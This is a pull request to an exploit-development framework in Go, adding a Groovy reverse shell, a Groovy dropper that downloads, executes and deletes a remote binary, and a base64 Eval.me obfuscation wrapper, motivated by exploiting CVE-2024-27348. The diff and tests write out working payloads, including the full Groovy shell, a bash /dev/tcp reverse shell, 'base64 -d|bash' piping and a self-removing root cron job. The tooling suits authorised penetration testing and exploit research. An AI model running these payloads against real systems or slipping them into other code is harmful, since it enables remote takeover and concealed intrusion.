### PR TITLE
Added a Groovy reverse shell, dropper, and wrapper

### DIFF
--- a/c2/httpservefile/httpservefile.go
+++ b/c2/httpservefile/httpservefile.go
@@ -16,7 +16,7 @@
 //
 // Where linux64 is a variable that contains "reverse_shell_linux-amd64".
 //
-// If you are only hosting one file, then GetRandom("") will also return your one file.
+// If you are only hosting one file, then GetRandomName("") will also return your one file.
 package httpservefile
 
 import (

--- a/c2/httpserveshell/httpserveshell.go
+++ b/c2/httpserveshell/httpserveshell.go
@@ -4,7 +4,7 @@
 //
 //		albinolobster@mournland:~/initial-access/feed/cve-2023-30801$ ./build/cve-2023-30801_linux-arm64
 //	 		-e -rhost 10.9.49.133 -lhost 10.9.49.134 -lport 1270 -httpServeFile.BindAddr 10.9.49.134
-//	 		-httpServeShell.SSLShell=false -httpServeFile.FileToServe ./build/reverse_shell_windows-amd64.exe
+//	 		-httpServeShell.SSLShell=false -httpServeFile.FilesToServe ./build/reverse_shell_windows-amd64.exe
 //	 		-httpServeFile.TLS=true
 //		time=2023-09-08T11:07:20.852-04:00 level=STATUS msg="Loading the provided file: ./build/reverse_shell_windows-amd64.exe"
 //		time=2023-09-08T11:07:20.856-04:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
@@ -22,9 +22,9 @@
 // From the exploit code, interacting with the variables isn't too much different from using httpServeFile
 // (since httpServeShell is just a wrapper):
 //
-//	 downAndExec := payload.WindowsCurlHTTPDownloadAndExecute(
-//			httpservefile.GetInstance().HTTPAddr, httpservefile.GetInstance().HTTPPort,
-//			httpservefile.GetInstance().TLS, httpservefile.GetInstance().GetRandomName(linux64))
+//	downAndExec := dropper.Windows.CurlHTTP(
+//		httpservefile.GetInstance().HTTPAddr, httpservefile.GetInstance().HTTPPort,
+//		httpservefile.GetInstance().TLS, httpservefile.GetInstance().GetRandomName(windows64))
 //
 // Which means anything that supports httpServeShell should also trivially support httpServeFile (and the other way around
 // as long as you are accounting for httpServeFile.SSLShell).

--- a/payload/bindshell/bindshell.go
+++ b/payload/bindshell/bindshell.go
@@ -18,8 +18,12 @@ type BindShell interface {
 
 type Default interface{}
 
-type NetcatPayload struct{}
-type TelnetPayload struct{}
+type (
+	NetcatPayload struct{}
+	TelnetPayload struct{}
+)
 
-var Netcat = &NetcatPayload{}
-var Telnet = &TelnetPayload{}
+var (
+	Netcat = &NetcatPayload{}
+	Telnet = &TelnetPayload{}
+)

--- a/payload/bindshell/netcat.go
+++ b/payload/bindshell/netcat.go
@@ -19,6 +19,7 @@ func (nc *NetcatPayload) Default(bport int) string {
 func (nc *NetcatPayload) Gaping(bport int) string {
 	return fmt.Sprintf(NetcatDefault, bport)
 }
+
 func (nc *NetcatPayload) Mknod(bport int) string {
 	node := random.RandLetters(3)
 

--- a/payload/dropper/dropper.go
+++ b/payload/dropper/dropper.go
@@ -6,8 +6,14 @@ package dropper
 
 type Dropper interface{}
 
-type UnixPayload struct{}
-type WindowsPayload struct{}
+type (
+	UnixPayload    struct{}
+	WindowsPayload struct{}
+	GroovyPayload  struct{}
+)
 
-var Unix = &UnixPayload{}
-var Windows = &WindowsPayload{}
+var (
+	Unix    = &UnixPayload{}
+	Windows = &WindowsPayload{}
+	Groovy  = &GroovyPayload{}
+)

--- a/payload/dropper/dropper_test.go
+++ b/payload/dropper/dropper_test.go
@@ -161,3 +161,12 @@ func TestWindowsPowershellHTTPDownloadAndExecute(t *testing.T) {
 		t.Log(comm)
 	})
 }
+
+func TestGroovyHTTP(t *testing.T) {
+	groovyPayload := dropper.Groovy.GroovyHTTP("127.0.0.1", 1270, "input", "output")
+	expected := `def f = new File('output');f.withOutputStream{it << new URL('http://127.0.0.1:1270/input').openStream()};` +
+		`f.setExecutable(true);def p = 'output'.execute();p.waitFor();f.delete();`
+	if groovyPayload != expected {
+		t.Fatal(groovyPayload)
+	}
+}

--- a/payload/dropper/groovy.go
+++ b/payload/dropper/groovy.go
@@ -1,0 +1,21 @@
+package dropper
+
+import (
+	"fmt"
+)
+
+// Using Groovy, download a remote file, set it to executable, execute it, and delete it.
+func (groovy *GroovyPayload) GroovyHTTP(lhost string, lport int, downloadFile string, output string) string {
+	// download and write the file
+	cmd := fmt.Sprintf(`def f = new File('%s');f.withOutputStream{it << new URL('http://%s:%d/%s').openStream()};`, output, lhost, lport, downloadFile)
+	// set the download binary as executable
+	cmd += `f.setExecutable(true);`
+	// execute it
+	cmd += fmt.Sprintf(`def p = '%s'.execute();`, output)
+	// wait for the process to finish
+	cmd += `p.waitFor();`
+	// delete it
+	cmd += "f.delete();"
+
+	return cmd
+}

--- a/payload/encode.go
+++ b/payload/encode.go
@@ -5,8 +5,6 @@
 package payload
 
 import (
-	b64 "encoding/base64"
-	"fmt"
 	"regexp"
 )
 
@@ -18,11 +16,4 @@ func EncodeCommandBrace(cmd string) string {
 
 func EncodeCommandIFS(cmd string) string {
 	return regexp.MustCompile(`\s+`).ReplaceAllLiteralString(cmd, "${IFS}")
-}
-
-// Base64 encodes the command. Wraps it in logic to base64 decode and pipe to bash.
-func EncodeEchoBase64ToBash(cmd string) string {
-	cmd64 := b64.StdEncoding.EncodeToString([]byte(cmd))
-
-	return fmt.Sprintf("echo %s|base64 -d|bash", cmd64)
 }

--- a/payload/encode_test.go
+++ b/payload/encode_test.go
@@ -25,13 +25,3 @@ func TestEncodeCommandIFS(t *testing.T) {
 
 	t.Log(encoded)
 }
-
-func TestEncodeEchoBase64ToBash(t *testing.T) {
-	encoded := payload.EncodeEchoBase64ToBash("whoami; id;")
-
-	if encoded != "echo d2hvYW1pOyBpZDs=|base64 -d|bash" {
-		t.Fatal(encoded)
-	}
-
-	t.Log(encoded)
-}

--- a/payload/fileplant/cron.go
+++ b/payload/fileplant/cron.go
@@ -1,7 +1,8 @@
-// cron based payloads.
+// file planting based payloads.
 //
-// The payload package contains cron and cronjob based payloads.
-package cron
+// The fileplant package contains payloads to aid the exploit developer in achieving execution
+// via binary planting, dll planting, and just general file hijinks.
+package fileplant
 
 import (
 	"fmt"

--- a/payload/fileplant/fileplant_test.go
+++ b/payload/fileplant/fileplant_test.go
@@ -1,13 +1,13 @@
-package cron_test
+package fileplant_test
 
 import (
 	"testing"
 
-	"github.com/vulncheck-oss/go-exploit/payload/cron"
+	"github.com/vulncheck-oss/go-exploit/payload/fileplant"
 )
 
 func TestEncodeSelfRemovingCron(t *testing.T) {
-	cron, xploit := cron.Cron.SelfRemovingCron("root", "/etc/cron.d/hi", "/tmp/test", "id")
+	cron, xploit := fileplant.Cron.SelfRemovingCron("root", "/etc/cron.d/hi", "/tmp/test", "id")
 
 	if cron != "* * * * * root /bin/sh /tmp/test\n" {
 		t.Fatal(cron)

--- a/payload/reverse/bash.go
+++ b/payload/reverse/bash.go
@@ -9,7 +9,7 @@ const (
 	BashTCPRedirection = `bash -c 'bash &> /dev/tcp/%s/%d <&1'`
 )
 
-// The default payload type for reverse bash utilizes the pseudo-dev networking redirects in default bash
+// The default payload type for reverse bash utilizes the pseudo-dev networking redirects in default bash.
 func (bash *BashPayload) Default(lhost string, lport int) string {
 	return fmt.Sprintf(BashDefault, lhost, lport)
 }

--- a/payload/reverse/groovy.go
+++ b/payload/reverse/groovy.go
@@ -1,0 +1,25 @@
+package reverse
+
+import (
+	"fmt"
+)
+
+const (
+	GroovyDefault = GroovyClassic
+	GroovyClassic = `shell='/bin/sh';if(System.getProperty('os.name').indexOf('Windows')!=-1)` +
+		`shell='cmd.exe';Process p=new ProcessBuilder(shell).redirectErrorStream(true).start();` +
+		`Socket s=new Socket('%s',%d);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),` +
+		`si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();` +
+		`while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)` +
+		`so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();` +
+		`Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();`
+)
+
+func (groovy *GroovyPayload) Default(lhost string, lport int) string {
+	return groovy.GroovyClassic(lhost, lport)
+}
+
+// A short payload that creates a reverse shell using /bin/sh -i.
+func (groovy *GroovyPayload) GroovyClassic(lhost string, lport int) string {
+	return fmt.Sprintf(GroovyClassic, lhost, lport)
+}

--- a/payload/reverse/java.go
+++ b/payload/reverse/java.go
@@ -30,7 +30,7 @@ p.destroy();
 s.close();`
 )
 
-// Defaults to the UnflattenedJava payload
+// Defaults to the UnflattenedJava payload.
 func (java *JavaPayload) Default(lhost string, lport int) string {
 	return java.UnflattenedJava(lhost, lport)
 }

--- a/payload/reverse/netcat.go
+++ b/payload/reverse/netcat.go
@@ -16,11 +16,9 @@ func (nc *NetcatPayload) Default(lhost string, lport int) string {
 	return fmt.Sprintf(NetcatDefault, lhost, lport)
 }
 
-// Utilize the GAPING_SECURITY_HOLE `nc -e` netcat option
+// Utilize the GAPING_SECURITY_HOLE `nc -e` netcat option.
 func (nc *NetcatPayload) Gaping(lhost string, lport int) string {
-
 	return fmt.Sprintf(NetcatGaping, lhost, lport)
-
 }
 
 // Uses mknod to create a FIFO that redirects interactive shell through netcat and the FIFO.
@@ -28,5 +26,4 @@ func (nc *NetcatPayload) Mknod(lhost string, lport int) string {
 	node := random.RandLetters(3)
 
 	return fmt.Sprintf(NetcatMknod, node, node, lhost, lport, node, node)
-
 }

--- a/payload/reverse/openssl.go
+++ b/payload/reverse/openssl.go
@@ -20,7 +20,6 @@ func (openssl *OpenSSLPayload) Mknod(lhost string, lport int) string {
 	node := random.RandLetters(3)
 
 	return fmt.Sprintf(OpenSSLDefault, node, node, lhost, lport, node, node)
-
 }
 
 func (openssl *OpenSSLPayload) Mkfifo(lhost string, lport int) string {

--- a/payload/reverse/reverse.go
+++ b/payload/reverse/reverse.go
@@ -18,31 +18,37 @@
 // most common case.
 package reverse
 
-// Defines the Default function to be created for each type of payload
+// Defines the Default function to be created for each type of payload.
 type Reverse interface {
 	Default
 }
 
 type Default interface{}
 
-// Defines the default Bash struct and all associated payload functions
-type BashPayload struct{}
-type GJScriptPayload struct{}
-type JJSScriptPayload struct{}
-type JavaPayload struct{}
-type NetcatPayload struct{}
-type OpenSSLPayload struct{}
-type PHPPayload struct{}
-type PythonPayload struct{}
-type TelnetPayload struct{}
+// Defines the default Bash struct and all associated payload functions.
+type (
+	BashPayload      struct{}
+	GJScriptPayload  struct{}
+	JJSScriptPayload struct{}
+	JavaPayload      struct{}
+	NetcatPayload    struct{}
+	OpenSSLPayload   struct{}
+	PHPPayload       struct{}
+	PythonPayload    struct{}
+	TelnetPayload    struct{}
+	GroovyPayload    struct{}
+)
 
-// Makes the Bash payloads accessible via `reverse.Bash`
-var Bash = &BashPayload{}
-var GJScript = &GJScriptPayload{}
-var JJS = &JJSScriptPayload{}
-var Java = &JavaPayload{}
-var Netcat = &NetcatPayload{}
-var OpenSSL = &OpenSSLPayload{}
-var PHP = &PHPPayload{}
-var Python = &PythonPayload{}
-var Telnet = &TelnetPayload{}
+// Makes the Bash payloads accessible via `reverse.Bash`.
+var (
+	Bash     = &BashPayload{}
+	GJScript = &GJScriptPayload{}
+	JJS      = &JJSScriptPayload{}
+	Java     = &JavaPayload{}
+	Netcat   = &NetcatPayload{}
+	OpenSSL  = &OpenSSLPayload{}
+	PHP      = &PHPPayload{}
+	Python   = &PythonPayload{}
+	Telnet   = &TelnetPayload{}
+	Groovy   = &GroovyPayload{}
+)

--- a/payload/reverse/reverse_test.go
+++ b/payload/reverse/reverse_test.go
@@ -10,7 +10,7 @@ import (
 
 func ExampleBashPayload_Default() {
 	fmt.Println(reverse.Bash.Default("127.0.0.1", 1337))
-	// Ouput:
+	// Output:
 	// bash -c 'bash &> /dev/tcp/127.0.0.1/1337 <&1'
 }
 
@@ -139,6 +139,19 @@ func TestPHPUnflattened(t *testing.T) {
 		t.Fatal(payload)
 	}
 	if !strings.Contains(payload, `proc_open("/bin/bash",`) {
+		t.Fatal(payload)
+	}
+}
+
+func TestGroovyClassic(t *testing.T) {
+	payload := reverse.Groovy.GroovyClassic("127.0.0.2", 9000)
+	expected := `shell='/bin/sh';if(System.getProperty('os.name').indexOf('Windows')!=-1)shell='cmd.exe';` +
+		`Process p=new ProcessBuilder(shell).redirectErrorStream(true).start();Socket s=new Socket('127.0.0.2',9000);` +
+		`InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream()` +
+		`,so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)` +
+		`so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);` +
+		`try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();`
+	if payload != expected {
 		t.Fatal(payload)
 	}
 }

--- a/payload/reverse/telnet.go
+++ b/payload/reverse/telnet.go
@@ -15,7 +15,6 @@ const (
 )
 
 func (telnet *TelnetPayload) Default(lhost string, lport int, colon bool) string {
-
 	return telnet.Mknod(lhost, lport, colon)
 }
 
@@ -27,7 +26,6 @@ func (telnet *TelnetPayload) Mknod(lhost string, lport int, colon bool) string {
 	}
 
 	return fmt.Sprintf(TelnetMknodNoColon, node, node, lhost, lport, node, node)
-
 }
 
 func (telnet *TelnetPayload) Mkfifo(lhost string, lport int, colon bool) string {

--- a/payload/wrapper.go
+++ b/payload/wrapper.go
@@ -1,0 +1,20 @@
+package payload
+
+import (
+	b64 "encoding/base64"
+	"fmt"
+)
+
+// Base64 encodes the command. Wraps it in logic to base64 decode and pipe to bash.
+func Base64EncodeForBash(cmd string) string {
+	cmd64 := b64.StdEncoding.EncodeToString([]byte(cmd))
+
+	return fmt.Sprintf("echo %s|base64 -d|bash", cmd64)
+}
+
+// Base64 encodes the command. Wraps it in logic to base64 decode and evaluate it in Groovy.
+func Base64EncodeForGroovyEval(cmd string) string {
+	cmd64 := b64.StdEncoding.EncodeToString([]byte(cmd))
+
+	return fmt.Sprintf("Eval.me(new String('%s'.decodeBase64()))", cmd64)
+}

--- a/payload/wrapper_test.go
+++ b/payload/wrapper_test.go
@@ -1,0 +1,27 @@
+package payload_test
+
+import (
+	"testing"
+
+	"github.com/vulncheck-oss/go-exploit/payload"
+)
+
+func TestBase64EncodeForBash(t *testing.T) {
+	encoded := payload.Base64EncodeForBash("whoami; id;")
+
+	if encoded != "echo d2hvYW1pOyBpZDs=|base64 -d|bash" {
+		t.Fatal(encoded)
+	}
+
+	t.Log(encoded)
+}
+
+func TestBase64EncodeForGroovyEval(t *testing.T) {
+	encoded := payload.Base64EncodeForGroovyEval("def f = new File('/tmp/vvNddILf');")
+
+	if encoded != "Eval.me(new String('ZGVmIGYgPSBuZXcgRmlsZSgnL3RtcC92dk5kZElMZicpOw=='.decodeBase64()))" {
+		t.Fatal(encoded)
+	}
+
+	t.Log(encoded)
+}


### PR DESCRIPTION
Added some Groovy functionality I wanted for CVE-2024-27348. Specifically, I wanted a simple reverse shell in Groovy, to be used like:

```go
case c2.SimpleShellServer:
    output.PrintfStatus("Creating a reverse shell payload for port %s:%d", conf.Lhost, conf.Lport)
    generated = reverse.Groovy.GroovyClassic(conf.Lhost, conf.Lport)
```

I also wanted a binary dropper so that I can drop a payload and execute it straight from Groovy. To be used like:

```go
case c2.HTTPServeShell:
    output.PrintfStatus("Creating dropper payload for port %s:%d", conf.Lhost, conf.Lport)
    outputFile := "/tmp/" + random.RandLetters(8)
    generated = dropper.Groovy.GroovyHTTP(httpservefile.GetInstance().HTTPAddr, httpservefile.GetInstance().HTTPPort, httpservefile.GetInstance().GetRandomName(""), outputFile)
```

Finally, I wanted basic obfuscation for these payloads so I settled on basic base64 decoding and then execution via Eval.me. That is used like:

```go
generated = payload.Base64EncodeForGroovyEval(generated)
```

The above address issues #149  #150 #151 

Internal discussion resolved that obfuscating payloads like this should go in `wrapper.go`. Additionally, I ran `golangci-lint run --fix` which made a bunch of formatting changes. And finally, for #152 I renamed the cron package to fileplant.

edit: I also fixed some c2 comments that had become out of date.